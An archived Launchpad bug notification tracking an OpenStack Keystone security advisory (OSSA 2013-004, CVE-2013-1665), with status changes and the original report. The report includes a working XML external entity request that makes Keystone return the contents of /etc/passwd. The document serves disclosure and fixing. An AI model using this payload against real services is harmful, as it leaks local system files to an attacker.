yahoo-eng-team team mailing list archive

[Bug 1100279] Re: [OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)

 

** Summary changed:

- Local file leak through entities in XML requests (CVE-2013-1665)
+ [OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)

** Also affects: ossa
   Importance: Undecided
       Status: New

** Changed in: ossa
       Status: New => Fix Released

** Changed in: ossa
     Assignee: (unassigned) => Thierry Carrez (ttx)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1100279

Title:
  [OSSA 2013-004] Local file leak through entities in XML requests
  (CVE-2013-1665)

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Committed
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  Evil XML! Jonathan Murray from NCC Group reported that you can leak
  local file contents using XML entities in Keystone requests:

  POST /v2.0//OS-KSDM/roles HTTP/1.1
  x-auth-token: d0e1a2d3b4e5e6f7
  content-type: application/xml

  <!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
  <role>
  <name>&ent;</name>
  </role>

  just returns the content of the local file in role.name.

  Looks like we should disable parsing entities altogether, they seem to
  be exploitable in pretty awesome ways. I'm not sure only Keystone is
  affected by this.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1100279/+subscriptions